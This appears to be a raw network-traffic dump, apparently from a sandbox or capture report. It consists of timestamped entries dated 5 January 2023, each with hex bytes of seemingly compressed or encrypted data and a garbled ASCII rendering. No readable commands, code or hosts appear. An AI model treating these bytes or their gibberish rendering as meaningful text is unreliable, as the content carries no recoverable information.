                                                                                                                                                                                    2023-01-05 07:59:31 UTC17484INData Raw: ba 26 f4 da 37 1e 58 51 61 67 5d 46 eb 17 eb a4 b1 67 63 5f e9 16 21 f4 9a ae c5 65 dd 96 26 11 ab 99 00 b5 8d af 62 bc 44 48 58 53 ac a4 0a 66 63 e4 de dc 35 fa b3 a5 f2 e4 56 24 f7 1d 2d fe ef f6 fe a3 af 92 1c 74 60 cf 92 fe f6 73 cc 7d 60 b6 05 4f 9e e3 44 90 4c c2 8f 47 a6 37 de 38 9d 36 5e 7e b5 2a da c0 fc 27 97 9d e2 35 ff a4 cf 21 89 18 56 00 79 fb bd d6 86 f4 0a dc 9e c0 c4 c5 c8 e9 6d 82 72 4d c7 38 92 3d 95 4e 06 39 7c d4 d1 8d 24 b2 ec be db 3b 02 94 1c cf bf c5 be 4d 6c c9 69 e7 7e e3 76 f1 d8 68 c7 b2 9d 2d df 5b 41 f6 95 eb 9a c5 0e d6 85 fc 6c 93 84 e8 6d 2b 9c ec cb 7a fe 77 33 24 cc c0 94 dd 02 c7 26 52 d1 9e 68 24 73 b6 fc 3e 2f a1 75 1c 64 13 92 2c 91 03 e1 e1 66 15 02 c6 d9 e2 48 70 ef 68 0e a2 f0 c9 bb 62 ce 5a 7f 1e c3 63 9e 33 ee
                                                                                                                                                                                    Data Ascii: &7XQag]Fgc_!e&bDHXSfc5V$-t`s}`ODLG786^~*'5!VymrM8=N9|$;Mli~vh-[Alm+zw3$&Rh$s>/ud,fHphbZc3
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17500INData Raw: 1c 54 ee 52 64 eb 41 3c d3 03 a2 11 c9 a9 a8 53 34 9e 03 47 4b 37 e2 20 44 61 ad 6c 16 89 1d fc f6 72 f1 10 44 b0 00 0d 31 50 46 05 5f a4 40 6b 75 70 01 73 d9 db a8 b7 67 bf d6 43 a2 f0 61 a8 bc fd 79 01 8b c7 76 c4 a7 84 7b 1a 5f 61 54 9b c7 e8 d5 00 0d a7 54 86 31 b3 b6 de bd 3f 61 fc 21 b4 18 fd f8 d9 d9 e2 e6 96 43 d0 37 99 71 8a 6d 0a 72 e7 17 a8 99 8e 09 ea e6 9e 4b d3 39 ab d1 b1 49 86 e0 ae 78 b0 c3 8f 7e c7 0d fc c9 02 14 e3 9e 7e ff 4d 89 3b ce 42 9f 58 fb 1d a3 ad 13 a5 34 fe 76 6e b0 2c 26 7c 7c 6b 7e ec fe 0a 23 67 d9 91 db 5c 73 c5 9a 40 28 d7 b3 4d a0 f2 d7 a7 bf 30 6e 29 e4 70 20 3a 8e 7d d1 0b 58 c1 df 0d 22 b9 f5 b2 4f 8e e6 42 40 a0 52 0d ff af 3a e0 f8 4e aa 3a a9 62 85 f7 bd 20 59 2c e3 e0 45 43 de f1 b7 fb f3 07 b7 cd 4b a3 7c 59 be
                                                                                                                                                                                    Data Ascii: TRdA<S4GK7 DalrD1PF_@kupsgCayv{_aTT1?a!C7qmrK9Ix~~M;BX4vn,&||k~#g\s@(M0n)p :}X"OB@R:N:b Y,ECK|Y
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17516INData Raw: 58 90 b8 cb 43 3f 69 28 75 dd 17 49 cd de 76 33 a8 90 c9 e1 c4 89 df ba 7c 83 69 75 7a ff cd 73 c3 49 7a 1b e2 91 7b dd a1 af 92 74 9f 97 34 5e 0f b5 7a 28 f6 5b d8 bc ff a2 3c fc a4 54 62 99 7a d8 a9 43 a5 6c 06 5a 0b c6 aa 6a 22 db 7a 60 49 f3 f1 57 16 4c 34 eb 01 aa b4 17 a6 ce ed e7 3a 47 44 f0 d7 8c 06 81 e7 e4 a3 c0 18 b2 03 fd b6 c4 93 37 cc 33 d5 17 07 01 7d 77 1a be 1b c3 69 ef cb 84 78 1e 3a b3 76 09 e2 b8 84 18 09 2a e1 8b 1a c4 de b0 8b 65 12 48 b4 0e 82 f8 b1 c8 be d5 c1 1f f0 fd 45 b5 d2 49 81 2c a1 14 d7 3c b9 df 3f 13 13 92 84 9e 51 fd 61 30 57 da 4f 7d c9 8b 35 02 8b c9 28 56 78 7f 8c aa 92 6a ab bc 79 58 8e 69 fb 52 5c 90 ed 67 31 68 a7 10 68 e2 d6 25 04 76 b1 9b 81 a5 81 b5 1d 26 b5 52 b9 e4 80 db 1c de b0 3e 2a fc 8c 09 0c 44 58 c8 1c
                                                                                                                                                                                    Data Ascii: XC?i(uIv3|iuzsIz{t4^z([<TbzClZj"z`IWL4:GD73}wix:v*eHEI,<?Qa0WO}5(VxjyXiR\g1hh%v&R>*DX
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17532INData Raw: 5e 34 97 2d c1 2f 16 56 a7 0c b2 d7 c2 61 27 ac e1 52 2f e9 3c b7 ee 00 24 b0 b9 54 e1 dc 9c 9b 66 78 0e 7b 7f 3d 5c c2 5b 7c ed 13 a1 b4 f2 1c eb 91 e9 e2 53 d3 de c4 a2 51 85 ef 3d b0 76 1f 7d 9d fa 66 3b 4b d5 bd cc ad 13 63 9a 61 1c 4d 17 ce 6b 8d e9 97 c0 60 e1 e6 72 45 16 b3 6a a7 5a 36 8c 56 f3 c5 d3 95 fa fc 98 ce 9b cf e9 93 7b 1e ce b0 a9 1f 6e 20 7b 03 1a 1d b8 79 df c0 de fa 6e 2e c6 eb 9f 0c 55 76 19 52 ac 5e 7e e6 29 30 3a 0c e4 3a 46 c3 e6 de 3a c4 48 1f 6b 61 a7 25 8a 2d ae 25 82 87 88 4b 9e 6b 63 b7 ad f5 d6 78 12 62 ed e4 6a 27 f6 92 14 31 a0 d1 79 e9 1c f5 3a 39 e7 e6 ee 91 26 31 8e dd db b0 f7 c1 55 02 e0 78 78 e0 27 80 9a 33 bc 66 1e da 35 2f 78 75 d0 0f fa d5 b0 f1 b1 11 42 bb da ad 43 b0 3d 90 70 45 57 2a a9 20 a5 a0 54 52 99 96 b6
                                                                                                                                                                                    Data Ascii: ^4-/Va'R/<$Tfx{=\[|SQ=v}f;KcaMk`rEjZ6V{n {yn.UvR^~)0::F:Hka%-%Kkcxbj'1y:9&1Uxx'3f5/xuBC=pEW* TR
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17548INData Raw: 4f 89 f0 62 5b 46 16 40 76 50 fd 22 b4 cb 93 d6 aa d5 40 b7 c6 67 ab 13 5e bb c5 7d d3 8c 9f f1 67 5e d3 b3 5f e0 63 78 75 20 81 7a 63 e1 46 5a c3 ed 9b 5c b0 e2 47 12 5c 4c 2d 97 69 5a d8 fc 15 64 57 68 72 ed 6e 2a 23 84 b0 b0 92 78 46 06 f3 f7 a2 7a 6a 6c aa 11 76 2e 1d 95 43 ef 17 06 8e 3a 01 3a 1a 7d fa db 23 93 3c dd 08 d6 01 c0 a2 8c 0d ed 33 ec 47 ce 5f 17 b1 18 c1 0c 24 b3 10 98 dd f7 85 ab 4e 29 2c 49 d2 4d 7e 93 a7 76 d0 c0 3e 69 34 b8 64 92 cd ba 58 ef 2f f3 cd 3e 11 62 74 d0 e3 33 1a d4 1a f2 53 2a a0 72 55 06 b4 96 ee 4f 2b 08 f6 58 8b c9 ef bc d6 be 64 48 21 99 58 be ba 2c d7 cc 11 13 e4 0f fa 4e 0f d5 48 6b d3 49 91 fa db cf c8 02 d1 a1 e4 cf 6b 75 f6 42 19 11 53 2b 51 df 36 50 e6 45 b2 a6 3c cc 22 0b 1a ed bf 1a 65 e9 1f cc b5 53 6e 31 f6
                                                                                                                                                                                    Data Ascii: Ob[F@vP"@g^}g^_cxu zcFZ\G\L-iZdWhrn*#xFzjlv.C::}#<3G_$N),IM~v>i4dX/>bt3S*rUO+XdH!X,NHkIkuBS+Q6PE<"eSn1
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17564INData Raw: ed 9d b9 e1 75 7a e4 26 2e 05 7e dc 83 0e 63 c3 ed a3 3a 27 fe b7 3f 34 ef b0 b6 8e 35 e4 f2 6e 1e 68 f4 74 f3 ef bf 42 05 23 8c 73 c9 e3 5b 96 78 6c 8a 27 2e cf fd 15 3c b0 84 0a 42 de 70 1b 50 3a 26 52 2d 74 3b cd f0 96 3b f1 55 68 5b 12 5d 07 d5 5d 29 27 77 ac a8 cf 00 6c ed 13 55 73 50 14 43 b2 7e 76 9c c8 82 03 c2 1a b1 06 2b 1d 4e bb 38 95 a9 80 69 94 4a 60 ad 1e d6 ea 14 1a 4a 89 b1 40 34 6c 6b 23 4b d3 52 35 2d 28 d7 33 6c a6 7b a2 fe 16 41 cf 0f d5 75 f1 fa 47 e2 b0 c6 a6 0a a7 49 9e 66 30 45 9d f8 fc 54 46 c8 4a 53 19 1e 4e 68 56 9a 67 21 32 df 21 30 fd 3b d4 0f 46 e6 91 93 02 f9 68 35 ee 50 fd a0 7d 56 5c 51 d9 27 fd df 6b ad 6c 9c b0 6b f2 8f 60 98 12 2e df a6 1c c9 9b e5 ba b4 31 d8 0d f3 07 4e 82 f8 9b e8 96 52 d1 57 73 f2 dd 9b b6 6c 3c c7
                                                                                                                                                                                    Data Ascii: uz&.~c:'?45nhtB#s[xl'.<BpP:&R-t;;Uh[]])'wlUsPC~v+N8iJ`J@4lk#KR5-(3l{AuGIf0ETFJSNhVg!2!0;Fh5P}V\Q'klk`.1NRWsl<
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17580INData Raw: ce ea 77 98 0b 34 dc 7c 94 3a cc 44 aa 34 1e 6d b5 2d 20 d7 a3 2c 5d e1 4f 12 8a a4 f3 d6 c4 a5 b9 00 ef 26 87 51 15 97 f7 13 dd cd e7 f5 98 75 bf d7 00 6f a5 33 e3 b1 0a 6a c8 9b 7c ed 30 e0 c4 bc e8 46 5b 2e 33 34 38 dc fd 69 c8 d7 a9 52 55 ca f4 b3 e6 65 1d d1 be 47 28 c0 43 c2 91 ec e6 f6 fd df bb 3a 08 ee a9 ea f2 1a 41 e2 f4 b5 12 73 26 12 04 c8 72 a7 cc b4 ca 80 e7 12 e7 b5 dd 8e 29 ac 3c 3c 7f 5e 98 a0 41 5b 62 83 44 9d e4 4c f4 f0 e8 5e 78 b3 d7 87 18 59 af fe b2 bc 57 de 6d 5e 92 28 49 86 e2 98 b5 af 66 39 ae d4 d7 88 57 a2 3e 6b 80 03 9c a2 71 02 9e 50 57 38 16 08 8a ef 29 c1 fb 3b 74 23 75 44 9f ad 7e dc ca 93 cf 44 81 0f 28 62 40 82 72 ca 3c d9 d0 84 3f 43 9b d3 48 82 21 6a 9a 7d 72 8b 32 39 82 9a fe 5f d7 29 38 83 a1 e4 45 a2 9a 06 c5 24 bd
                                                                                                                                                                                    Data Ascii: w4|:D4m- ,]O&Quo3j|0F[.348iRUeG(C:As&r)<<^A[bDL^xYWm^(If9W>kqPW8);t#uD~D(b@r<?CH!j}r29_)8E$
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17596INData Raw: 37 a8 be 23 cb fb cc 7f d6 d1 8c 8d f5 33 f4 1b c4 72 ad 76 50 90 6b c6 b9 5b 86 54 27 d3 11 14 29 71 8e 70 d9 03 a5 9d 4b 7a a1 43 bc 75 6c 88 f2 10 7c 83 61 38 a4 a6 69 27 17 79 b3 a7 b8 2a f9 2f ac d6 68 76 91 c9 94 f3 40 55 2a d8 87 38 07 53 20 bb eb a8 dd 50 38 3f 44 13 29 a5 8c 7d a4 39 42 c1 8e 09 e2 71 d2 6d 4f ef 92 97 04 11 3e 63 56 b2 07 76 9e 35 ac e9 b6 82 0c d6 be 1e 6f ae 48 04 ee 03 f1 2a 9a e2 e7 bf 9e 6d 68 1e 7c 47 b9 57 20 84 4b c6 29 60 a0 c2 0d 0f 2a 96 d2 53 e1 39 b3 f0 db 7e 34 a6 5e fb 2b 8a 71 0b 9d b2 f6 c2 ff 74 71 8f ae ee 30 52 bb be 02 0d 70 ec fd a0 d9 d1 e9 0b 4a 30 7c 59 67 97 4d d4 e7 df 33 25 42 e7 2b 2b f3 48 03 68 38 7e e3 ed cf 7d 93 b7 33 7a 46 78 36 56 5b 51 4f 61 53 9a 25 5a b7 ad 14 4e 5c 0d 63 5d bc 3b 45 85 6c
                                                                                                                                                                                    Data Ascii: 7#3rvPk[T')qpKzCul|a8i'y*/hv@U*8S P8?D)}9BqmO>cVv5oH*mh|GW K)`*S9~4^+qtq0RpJ0|YgM3%B++Hh8~}3zFx6V[QOaS%ZN\c];El
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17612INData Raw: af 00 69 ae 22 e2 bd 58 ae 8e 31 ce 57 7b c0 74 52 81 1c 19 38 b8 7b 53 4f 8b bc 59 98 6f 4d 4e bf 86 7f 0d 8d db 21 f9 ce a0 f9 30 e0 3f 33 af cd c4 a2 18 b8 db e1 8c 4a d2 61 6d 5e 40 c7 e0 62 49 3a 8d 7e 34 b2 8d 4a 40 d2 c8 2f c6 74 ef 9d c7 26 25 b0 42 10 15 db 27 13 fb 5c 4b 92 4c 10 21 5d 97 d9 0d 65 b1 65 30 75 da 6f 32 ec 50 66 a7 de 77 26 b2 e7 ed 70 ff 56 d8 f1 1e 2b 83 1d 7c b1 de 78 a9 2d 21 c5 27 48 33 e9 d1 f3 e1 2c 97 35 fb 3c 9d 78 1e 40 ca f0 82 32 f0 60 2f c5 2c 82 1f df c3 ce 4d 8a 58 6c dd dc e0 d4 2a 85 dd 32 43 7e b5 00 29 ff 35 db e7 c1 5a 7b 72 21 f8 0d 75 3a b4 ce 4f ce 6c b1 0c 4d 10 23 fa 62 ad df 8f c6 8a c0 a9 1c 76 36 df 6a d8 30 b7 3a a2 2d ef 19 7f 0b 5e a8 0e 78 54 24 16 eb 23 eb 8f fb 0d e4 25 ec 47 a4 2b bc 02 fe 06 62
                                                                                                                                                                                    Data Ascii: i"X1W{tR8{SOYoMN!0?3Jam^@bI:~4J@/t&%B'\KL!]ee0uo2Pfw&pV+|x-!'H3,5<x@2`/,MXl*2C~)5Z{r!u:OlM#bv6j0:-^xT$#%G+b
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17628INData Raw: bc 9f be 5f 4d e2 ba 6d da ec e1 cc 85 6e f1 24 20 03 1c fb 15 29 45 ad 9b b0 61 c5 59 1f 8f d2 fe 19 0b 92 bb d0 a4 c3 47 ab 1e 78 77 a5 80 21 bc 4e 91 89 ac 75 76 3c b3 83 a1 ae 5e df 46 4d a2 e9 eb 7b be 1c db f9 0a 91 65 1b ed 8f 02 7b b2 20 98 64 b2 bd 18 cd 1f 7a 6a e0 39 82 84 c9 64 cb b4 24 77 12 5c b2 8e 70 1d e2 d3 6b 40 ba 7b 55 2e ca 7d 68 e6 1c a8 c1 00 44 5e 48 da 13 e6 e0 8b 9b dc cb ee 0f 14 cf 47 96 ae e7 1b bc 6a b6 69 8c 32 01 5c fe 89 c6 67 67 b0 5f 08 ea c8 5c a6 9f 8b 4b 49 f8 21 90 04 88 7a 3b e1 04 84 57 a6 e3 41 6e d5 d8 ee 12 8d d2 d8 43 de b0 3c fc b1 5c d4 af 94 50 37 99 d6 cf 68 f8 08 b6 ab 59 78 57 9a fa 0d 5a 51 9e d8 f2 20 2a bc 07 7b 10 e6 12 ad 47 46 e7 7f cb bb a5 dd 0a 94 ae d1 7f e1 84 06 25 3f 35 0c ac c3 4b 14 6b e9
                                                                                                                                                                                    Data Ascii: _Mmn$ )EaYGxw!Nuv<^FM{e{ dzj9d$w\pk@{U.}hD^HGji2\gg_\KI!z;WAnC<\P7hYxWZQ *{GF%?5Kk
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17644INData Raw: 15 84 8b 5c 8c e2 80 bd fa f8 fc a9 31 0f 3b 5e 11 c3 7f 63 79 9b 85 64 4e 7e 56 92 18 5b fc 9c f8 85 0e c5 0c 86 82 4b f9 7d 74 96 20 60 1e 76 ea ce a0 92 63 21 70 36 5a 7d da 83 a0 b6 46 4e 1b dc 0a 32 1b 8f 71 7e 1d 8e bb 69 55 e9 47 4b 47 f6 fe 74 f7 e5 4f 65 2a 41 15 18 3b 54 2f 17 4e 30 a6 2b 3c 2e 5d f4 0c ca 9a 60 e5 d2 c7 58 57 00 a0 47 8a 77 55 9e 78 7d d8 f3 cb b4 2c 80 f5 2d 55 f8 cf f2 2e 7e 86 5f 46 b1 bc 35 94 c4 f1 52 04 53 ee 28 e4 a3 99 5e 0d ab fa 41 56 92 1a a7 da 37 b3 94 fa 7f 16 17 8a 59 36 37 ac e4 cf 3a bb 2e 8b 23 25 73 e1 0c 6e e6 93 5a c9 39 b7 53 a3 ad 14 d9 11 df fe ac 20 44 df bb 03 e5 c7 88 53 5c 1c 8c 4b 42 df f7 85 8d 42 65 51 f5 5b ad e7 59 82 cd 6a e3 4c 9a 80 9a b2 af 81 62 1d ad 4d f7 38 a4 22 43 d1 1b 70 99 0c cf 75
                                                                                                                                                                                    Data Ascii: \1;^cydN~V[K}t `vc!p6Z}FN2q~iUGKGtOe*A;T/N0+<.]`XWGwUx},-U.~_F5RS(^AV7Y67:.#%snZ9S DS\KBBeQ[YjLbM8"Cpu
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17660INData Raw: d6 95 32 82 c0 61 25 8a f0 99 cc 20 12 d5 79 95 f6 cc 69 3b 57 f4 48 13 de e7 71 21 b1 f0 d7 a9 ff b2 50 e1 11 44 1c 07 9d c1 80 95 8c af 0c 6a 3d ae fa 14 43 52 61 a3 ab b8 7a 0e 3a 92 b6 0c b0 6d 65 37 72 38 bb 60 11 bb f9 81 68 51 a4 fb 64 c3 23 1e c8 cd 4d a2 a6 76 f9 0e 86 bc 85 62 8f 30 8f 66 b8 a5 fe 48 12 d1 cd f2 12 20 b9 cb 71 79 2d 44 c9 e6 70 55 c5 b6 d6 60 62 3f 4b 98 de 2b b9 c4 16 47 c5 a5 10 41 54 95 46 22 c6 eb c7 ab ec f4 7a 82 ba e8 b9 b2 7e c2 c1 59 70 20 d8 65 e2 e3 91 40 1a ab c9 32 43 de 90 49 c9 35 db f3 e8 87 d8 68 ac fc 3d 3d 47 cf a8 6e 4b 4b 4b 67 1d 89 3c 80 8c 5f 71 55 3b c9 6c 0c 62 5d de b0 a7 cd fc 8f 00 30 d6 68 fe 8d 2c 29 e7 0b 75 3f bf 21 73 8d 4b b9 de 9b 9b 3f 8c 59 34 fc 32 2c 05 9f 31 3d 2b b8 90 2d 4c 3e 36 bd 11
                                                                                                                                                                                    Data Ascii: 2a% yi;WHq!PDj=CRaz:me7r8`hQd#Mvb0fH qy-DpU`b?K+GATF"z~Yp e@2CI5h==GnKKKg<_qU;lb]0h,)u?!sK?Y42,1=+-L>6
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17676INData Raw: a1 11 0e 5c 9c fb e0 eb 23 5d 60 99 a4 8c 29 ef b3 0e e8 63 bc e1 6a ba 26 f2 09 d7 a0 c5 eb 0d 83 79 67 ea aa 01 d8 c6 56 df b9 d0 1d 95 2c d9 81 f4 2e 7c 4b e5 53 d6 1d 2d 26 40 99 9a a9 b7 b1 16 fc c5 62 fa de eb 22 a5 f3 00 d3 de 14 b2 b7 b2 d9 3f 87 4b 3c d2 bd 91 5e b4 a4 4e 40 d1 2a c8 98 35 e6 76 3e 55 4d 0c 5a 45 b9 c5 ab ca 25 16 b4 18 c9 95 0b c4 07 ee bc cc b2 8b ce 09 eb 67 9e 7f d3 ab cb 96 14 4c 99 6a 53 57 fe 7d 23 f2 aa f4 0f 93 c7 4c b6 e7 c2 27 0a 40 eb 1a 53 74 e6 d0 c4 33 25 7c 8f 0b 70 5e 53 d6 70 2d a9 5f c1 59 5b de bc a0 c6 6a c1 cf 27 94 4f 48 71 4d a1 17 da d6 5d 2d 0c 79 4e 0f 94 8f 2e 8e ad fa 1b a5 d1 6d 76 f7 08 32 a7 95 aa 30 ba 93 7b a8 a1 e1 48 76 62 83 b2 1e 12 c5 f2 0c 8a d6 ba de 5d e7 53 07 75 22 85 80 be f9 46 82 78
                                                                                                                                                                                    Data Ascii: \#]`)cj&ygV,.|KS-&@b"?K<^N@*5v>UMZE%gLjSW}#L'@St3%|p^Sp-_Y[j'OHqM]-yN.mv20{Hvb]Su"Fx
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17692INData Raw: ae 8b d2 91 5b 95 ef 52 36 ce 5b ae 23 4c e6 f4 56 c4 49 6e 54 69 d0 01 d7 be b6 3e d0 9e ca 4f cf cf 30 06 ac aa 72 15 fd 3d a6 d1 21 b0 5b 07 69 5e 5a ca 6a f4 72 5b 5e 3a 95 4b e3 74 17 2c df 37 c1 98 79 7e 8c ba fd 79 f7 a6 dd be 85 5c e0 d9 5a cd 6d 2d c7 79 f7 b7 d6 67 11 aa 9a c3 ae c5 d1 2f d7 b8 72 fc 0f f1 3f bd 7c 15 d2 bf b0 2d ae 39 6b 1d 4a eb 41 13 87 53 90 53 42 46 7f be c3 dc 0e 5d 90 c3 73 0f 93 f2 50 0a a2 f2 aa 12 10 93 83 55 53 96 43 7d a2 7f be f9 83 0b fc 59 bd 44 a5 8b 79 99 59 e9 ba 0c 74 5e 2b c2 b6 0b 75 95 8c 04 21 55 37 74 9b 38 af 38 39 3a 64 36 1a e7 61 df 5d 71 5e 8e 75 43 3f 64 f1 c2 6c e8 76 c6 a2 1b 04 e5 42 6c d8 d3 27 4c 1d 57 8f cf 60 1c b7 d3 ea 6b e1 50 c6 a0 ef 30 ec 72 a6 3a 8f 32 cf 53 16 fb 05 cf cc c4 81 01 34
                                                                                                                                                                                    Data Ascii: [R6[#LVInTi>O0r=![i^Zjr[^:Kt,7y~y\Zm-yg/r?|-9kJASSBF]sPUSC}YDyYt^+u!U7t889:d6a]q^uC?dlvBl'LW`kP0r:2S4
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17708INData Raw: 4f 4e af 51 b5 cb 8b 4e 10 fa 15 f6 6d e3 ac 13 b8 7c 7a cd 26 a9 4e ed a2 4e a5 5f 57 5e 35 68 a7 de e5 7b 1d 16 e2 e3 db a3 4c c1 fd 13 a4 48 de 97 36 d8 55 15 6b 7f e8 69 4f 33 d2 f3 dc 04 a1 ec 84 90 ac c8 b0 1d ff dd f4 18 9a 14 96 d5 67 84 0c 61 3e 9f 6f 3b 11 56 1e 2e d1 c4 ce ae 00 1a a8 3a 29 56 c2 0f 00 13 c8 34 d3 58 d9 5b ef 69 f1 96 db 26 d6 ea 0b 64 8b 6f 60 d5 dc 6b d7 c0 98 c8 c6 5b 32 67 1a 47 df 85 6e 16 03 24 bc 9a 74 13 d0 e1 cb 24 8c 27 2c 6a 2d 9e 29 48 70 4f d2 fc 58 69 4c ce d7 a8 f7 90 ed eb b2 cd 58 46 38 7a 95 21 2b fd 47 ce b5 09 a1 41 ef e6 bb d5 5e 00 ec 60 ec 25 ca 48 1f d0 9c 3a 87 10 c5 e6 fd 0f f6 d1 ca 46 ca 96 c9 e6 8b 8a 50 3b 85 33 11 b6 11 1e 3c a3 74 32 3d dd ff c9 cc 43 9b 3a 15 ba 98 3a 1b 73 5b 6d 11 d4 a9 b3 0e
                                                                                                                                                                                    Data Ascii: ONQNm|z&NN_W^5h{LH6UkiO3ga>o;V.:)V4X[i&do`k[2gGn$t$',j-)HpOXiLXF8z!+GA^`%H:FP;3<t2=C::s[m
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17724INData Raw: 51 d0 35 07 db bd 0d 5f 21 87 f0 f9 7a da f2 ff ea d3 f3 41 ea 0a 68 ab b9 9e 8d 10 ee de 7e c9 ac 55 30 6f 81 a8 96 25 a3 77 1d 4a 96 d5 28 7b 5c 8b bf 34 b5 b9 75 ad 42 3c 6f 71 50 c7 f4 d2 ed 1e 1b fd fd ac 90 1d 4c 26 e7 c6 bd 7d d2 f3 d2 8d 58 af 46 a6 f0 9b c3 2f bc cb c8 31 c5 1e 19 74 e1 04 78 ae 24 55 e3 01 c4 70 45 0a 56 0e a1 c1 80 1f b5 17 a9 dd 61 61 03 c7 fa 0c ec e1 9e 0e 86 73 f0 fb d2 f2 13 85 9b 18 79 04 85 91 f7 f5 cb 94 03 4e 30 73 23 51 48 04 20 9c d1 e7 5d c0 b7 dc 82 ad 68 9d 4e b8 88 a0 57 76 cc 8c 95 f5 e7 64 52 5d 72 cb f5 1b c2 82 d5 84 9f 3b a6 85 81 9e 09 ad b8 dd 96 23 5b 2c 6f b9 ce ac 9d bd e5 9a 91 ed 1d ab 18 9e 59 ec 5d bb 52 db aa 44 4b a5 cd 3d 04 65 fb 95 84 10 73 bd f3 4a a2 52 43 ab 16 b1 c7 6e 88 27 34 c1 01 a1 13
                                                                                                                                                                                    Data Ascii: Q5_!zAh~U0o%wJ({\4uB<oqPL&}XF/1tx$UpEVaasyN0s#QH ]hNWvdR]r;#[,oY]RDK=esJRCn'4
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17740INData Raw: c7 65 39 ad 20 08 6a de 36 5a b4 3b ed 46 0e b1 5f b1 62 7d 2a d7 12 0a f9 f9 f9 50 21 83 60 6a 93 e7 3f 55 4e e4 82 24 88 3d 3d ab de 61 cd e7 df 99 cc c4 fd 76 bf 25 f8 39 0e 6c e7 12 20 44 dd f5 ff c8 07 6c 9f 9f 21 df d5 c2 ae 98 ee 21 0c bc d1 7a c2 fc 8b 9c 63 9d 4b 20 b0 27 aa e5 16 ce ea 1e 18 9c 3c cc c8 48 6f 71 e3 55 db 9c e3 86 0c 21 50 f3 33 83 8d 92 1e 89 59 31 f3 c3 c1 e7 6f a1 b0 71 68 7d 86 b8 11 1a c6 2f 69 d7 b3 97 55 60 69 78 fe ca 66 e7 e8 8e 75 a4 2b cf b1 c3 98 2d 30 ce 2d 94 f1 52 28 17 60 29 e6 5f 47 17 9a 7c 2d 9e 0d 0f 5d f7 25 64 87 72 88 87 c9 22 66 35 c5 e9 18 33 d7 de 13 93 13 87 e8 de 76 58 7c 8f 16 c9 cd f2 8b f1 d9 21 41 c5 a5 e7 96 69 05 98 06 5c a8 e5 93 3b ee 4f e8 54 2b 78 2d 38 f3 40 aa 19 09 d0 fc d3 a5 fc f0 ba 4a
                                                                                                                                                                                    Data Ascii: e9 j6Z;F_b}*P!`j?UN$==av%9l Dl!!zcK '<HoqU!P3Y1oqh}/iU`ixfu+-0-R(`)_G|-]%dr"f53vX|!Ai\;OT+x-8@J
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17756INData Raw: 9c c5 70 d5 82 47 f2 02 1a 36 d0 19 22 c2 e7 6f 35 e9 16 c8 e9 e7 20 20 34 07 88 54 d4 99 2c ab 2c 3a 78 29 9f d5 8c 7b 67 ff 6a 2d 2b 1d fd e5 aa ab 5d d5 bf 63 ae 8b ca ac 19 eb bb 92 1d af 7c b7 b5 ce 68 f7 59 bd 34 72 76 da c0 35 64 cd 96 46 fa b4 02 8c b5 98 d8 f5 8a 73 27 12 38 63 2d 2f 08 9c da f2 1d da d4 30 d9 b6 2c 76 89 1f 56 8c 68 61 c3 98 05 b4 9f 48 4d 64 82 74 d2 8f 5b 1e 24 b1 35 ce 42 19 d2 7c e8 5a e7 11 d8 18 a7 74 3e d4 01 9b 29 c0 cf 37 d4 a7 53 a4 98 c7 0e a1 46 02 65 05 78 1a ec 84 16 36 47 3e fe 8a 43 ac a0 3f 17 8a 2b dc 57 1c c4 57 79 97 4f df d6 7a 8c e2 6f 79 9f a2 ae 9e f3 a2 5f af df a3 61 38 5d 11 23 28 91 2b 54 5a f3 67 34 13 10 e5 64 e0 5e ce b9 bf 46 12 e8 68 61 e2 79 ad 47 31 8a 4c 64 e1 2e 2f e4 4b e3 bd 11 89 b8 32 83
                                                                                                                                                                                    Data Ascii: pG6"o5 4T,,:x){gj-+]c|hY4rv5dFs'8c-/0,vVhaHMdt[$5B|Zt>)7SFex6G>C?+WWyOzoy_a8]#(+TZg4d^FhayG1Ld./K2
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17772INData Raw: db cd 55 cb a2 95 d2 aa e2 05 52 85 f9 c0 fa d5 e4 c8 5c 30 9d e1 82 06 7c 62 e1 be ec 48 fc 87 29 cf 4e de 72 35 c3 67 72 80 64 c0 e9 1f 43 74 a5 45 54 e7 85 82 37 fc 24 5d 4a ea 91 a3 1e 9d 16 1f 49 96 32 54 01 82 99 7a d2 81 87 90 c5 63 c2 80 f2 3f a7 e1 88 24 09 82 45 da 04 25 a4 7a b8 3e 53 11 39 23 46 2e 68 76 3a fd 9b 43 fe 6c e3 66 51 12 f2 f4 ad 69 63 f4 61 58 d1 65 9f d4 71 84 a1 83 36 c8 12 81 92 12 32 ea aa db 70 21 7b 73 ad 92 79 6a b5 f5 9a 05 b2 bc c2 78 1b c1 1a d1 ff 6b 31 84 5b cb 2f 7c 19 80 f6 56 9d e3 32 ac 58 bc 89 e1 85 7c d5 5b 11 b4 e1 60 79 05 22 b5 a7 6c c3 82 12 48 2c 36 4c 03 11 cd 1d 60 c2 3a a0 bf 1c d5 bb 52 14 93 f8 f8 b3 66 98 90 cb 7a e4 3d bb b8 6d 4e 6d 5d ee ff f3 76 af e6 49 9c da 7b 42 f0 d1 0c 2c 37 fd 5e df 29 78
                                                                                                                                                                                    Data Ascii: UR\0|bH)Nr5grdCtET7$]JI2Tzc?$E%z>S9#F.hv:ClfQicaXeq62p!{syjxk1[/|V2X|[`y"lH,6L`:Rfz=mNm]vI{B,7^)x
